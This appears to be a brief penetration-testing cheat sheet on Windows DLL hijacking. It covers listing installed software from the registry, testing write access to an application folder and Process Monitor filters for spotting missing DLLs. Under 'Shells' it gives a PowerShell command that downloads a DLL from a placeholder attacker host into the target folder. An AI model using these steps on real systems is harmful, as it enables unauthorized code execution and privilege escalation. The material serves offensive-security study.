Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Google search each application to see if its vulnerable to DLL hijacking
echo "test" > '<Application File Path>\test.txt' type '<Application File Path>\test.txt'
Apply the following filters
Process Name
is
<Application Name>
Include
Operation
CreateFile
Path
contains
<DLL File Name>
Shells
iwr -uri http://<Kali IP Address>/<DLL File Name>.dll -Outfile '<Application File Path>/<DLL File Name>.dll'
Last updated 23 days ago